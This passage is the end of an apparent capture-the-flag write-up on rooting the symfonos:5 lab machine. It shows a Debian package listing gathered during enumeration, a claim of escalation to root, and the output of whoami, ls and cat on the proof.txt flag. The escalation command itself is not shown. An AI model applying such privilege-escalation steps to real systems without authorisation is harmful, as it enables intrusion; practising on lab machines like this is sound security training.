Desired=Unknown/Install/Remove/Purge/Hold                                                                                                                 
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend                                                                            
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)                                                                                                
||/ Name                          Version                     Architecture Description                                                                    
+++-=============================-===========================-============-===============================================================================
ii  adduser                       3.118                       all          add and remove users and groups                                                
ii  ame                           1.0                         amd64        no description given                                                           
ii  apparmor                      2.13.2-10                   amd64        user-space parser utility for AppArmor
ii  apt                           1.8.2                       amd64        commandline package manager
ii  apt-listchanges               3.19                        all          package change history notification tool
ii  apt-transport-https           1.8.2                       all          transitional package for https support
ii  apt-utils                     1.8.2                       amd64        package management related utility programs
ii  aufs-dkms                     4.19+20190211-1             all          DKMS files to build and install aufs
ii  aufs-tools                    1:4.14+20190211-1           amd64        Tools to manage aufs filesystems
ii  base-files                    10.3+deb10u2                amd64        Debian base system miscellaneous files
ii  base-passwd                   3.5.46                      amd64        Debian base system master password and group files
ii  bash                          5.0-4                       amd64        GNU Bourne Again SHell
ii  bash-completion               1:2.8-6                     all          programmable completion for the bash shell
ii  bind9-host                    1:9.11.5.P4+dfsg-5.1        amd64        DNS lookup utility (deprecated)
ii  binutils                      2.31.1-16                   amd64        GNU assembler, linker and binary utilities
ii  binutils-common:amd64         2.31.1-16                   amd64        Common files for the GNU assembler, linker and binary utilities
ii  binutils-x86-64-linux-gnu     2.31.1-16                   amd64        GNU binary utilities, for x86-64-linux-gnu target
ii  bsdmainutils                  11.1.2+b1                   amd64        collection of more utilities from FreeBSD
ii  bsdutils                      1:2.33.1-0.1                amd64        basic utilities from 4.4BSD-Lite
ii  build-essential               12.6                        amd64        Informational list of build-essential packages
ii  busybox                       1:1.30.1-4                  amd64        Tiny utilities for small and embedded systems
ii  bzip2                         1.0.6-9.2~deb10u1           amd64        high-quality block-sorting file compressor - utilities
ii  ca-certificates               20190110                    all          Common CA certificates
ii  cgroupfs-mount                1.4                         all          Light-weight package to set up cgroupfs mounts
ii  console-setup                 1.193~deb10u1               all          console font and keymap setup program
ii  console-setup-linux           1.193~deb10u1               all          Linux specific part of console-setup
ii  containerd.io                 1.2.10-3                    amd64        An open and reliable container runtime
ii  coreutils                     8.30-3                      amd64        GNU core utilities
ii  cpio                          2.12+dfsg-9                 amd64        GNU cpio -- a program to manage archives of files
ii  cpp                           4:8.3.0-1                   amd64        GNU C preprocessor (cpp)

This successfully escalated privileges, switching the user to the root account.

# whoami
root                                                                                                                                                      

Navigating to the /root directory, the contents revealed a file named proof.txt, a common marker in CTF challenges and penetration tests to confirm successful exploitation.

# cd /root                                                                                                                                                
# ls -al                                                                                                                                                  
total 32                                                                                                                                                  
drwx------  4 root root 4096 Feb  5  2020 .                                                                                                               
drwxr-xr-x 19 root root 4096 Jan  6  2020 ..                                                                                                              
lrwxrwxrwx  1 root root    9 Jan  6  2020 .bash_history -> /dev/null                                                                                      
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc                                                                                                         
drwx------  3 root root 4096 Jan  6  2020 .gnupg                                                                                                          
drwxr-xr-x  3 root root 4096 Jan  4  2020 .local                                                                                                          
-rw-r--r--  1 root root  148 Aug 17  2015 .profile                                                                                                        
-rw-r--r--  1 root root 1209 Jan  6  2020 proof.txt                                                                                                       
-rw-r--r--  1 root root   66 Jan  6  2020 .selected_editor                                                                                                
# cat proof.txt                                                                                                                                           
                                                                                                                                                          
                    Congrats on rooting symfonos:5!                                                                                                       
                                                                                                                                                          
                                   ZEUS                                                                                                                   
              *      .            dZZZZZ,       .          *                                                                                              
                                 dZZZZ  ZZ,                                                                                                               
     *         .         ,AZZZZZZZZZZZ  `ZZ,_          *                                                                                                  
                    ,ZZZZZZV'      ZZZZ   `Z,`\
                  ,ZZZ    ZZ   .    ZZZZ   `V
        *      ZZZZV'     ZZ         ZZZZ    \_              .
.              V   l   .   ZZ        ZZZZZZ          .
               l    \       ZZ,     ZZZ  ZZZZZZ,
   .          /            ZZ l    ZZZ    ZZZ `Z,
                          ZZ  l   ZZZ     Z Z, `Z,            *
                .        ZZ      ZZZ      Z  Z, `l
                         Z        ZZ      V  `Z   \
                         V        ZZC     l   V
           Z             l        V ZR        l      .
            \             \       l  ZA
                            \         C          C
                                  \   K   /    /             K
                          A    \   \  |  /  /              /
                           \        \\|/ /  /
   __________________________________\|/_________________________
            Contact me via Twitter @zayotic to give feedback!

To view the root flag, the cat command was executed on the proof.txt file, verifying ownership of root privileges and completing the escalation process.


Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!